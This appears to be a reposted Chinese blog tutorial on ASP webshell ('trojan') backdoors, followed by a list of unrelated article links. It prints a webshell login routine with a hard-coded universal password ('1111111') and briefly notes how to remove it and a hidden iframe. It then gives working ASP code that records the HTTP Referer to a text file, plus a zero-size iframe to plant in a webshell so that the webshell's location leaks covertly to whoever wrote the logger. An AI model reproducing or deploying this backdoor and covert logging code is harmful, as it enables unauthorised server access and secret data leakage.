揭密如何写ASP木马后门
来源:互联网 发布:性价比高的电钢琴知乎 编辑:程序博客网 时间:2024/05/20 22:00
正常的:
EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!"
加有万能密码的:
EnD fUNCtION IF SEssIoN("web2a2dmin")<>UsERpaSs thEn IF requeSt.FoRM("pass")<>"" TheN iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then SEsSIoN("web2a2dmin")=uSERPAss rESPOnsE.rEdirEct Url ELse rrs"对不起,密码验证失败!"
1111111就是传说中的万能密码了。
找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!
下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址 width=0 height=0></iframe>
找到后删了,到此asp后门就算剔除了!
下面教大家后门的原理:
这是一段收信的asp代码将其保存为1.asp
<%url=Request.ServerVariables("HTTP_Referer") set fs=server.CreateObject("Scripting.FileSystemObject") set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True) file.writeline url file.close set file=nothing set fs=nothing %>
代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里
上传到空间比如 http://127.0.0.1/1.asp
然后里用
<iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe>
插到asp木马中
那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
0 0
- 揭密如何写ASP木马后门
- 计划自己写一个木马后门
- 如何防止ASP木马
- php 一句话木马、后门
- IIS如何防ASP木马
- 广外专版-木马后门
- 如何查杀和防范ASP木马
- ASP木马
- ASP木马
- 通过Mysql 的语句生成后门木马
- 木马常用的后门技术讲解
- 检测捆绑木马及后门de方法
- 木马后门常用到的API
- 文件操作之木马后门的配置
- 代码简短且隐蔽的后门木马
- 一个DDOS木马后门病毒的分析
- 一个DDOS木马后门病毒的分析
- 写Android后门工具
- 第一个Python单线程爬虫(使用正则表达式)
- Windows下FFTW的安装_史上最全
- Django Model字段类型(Field Types)
- 用LinkedList实现队列和栈
- Android 热补丁实践之路
- 揭密如何写ASP木马后门
- CSS最佳实践
- vue+webpack在“双十一”导购产品的技术实践(转发)
- IDEA搭建服务器(tomcat)及数据库(mysql)并创建webapp项目
- 5位运动员参加了10米台跳水比赛,有人让他们预测比赛结果
- 【Android - 框架】之Retrofit+RxJava的使用
- web前端之HTML中a标签锚点
- md5WithRSA
- POJ2051 Argus 优先队列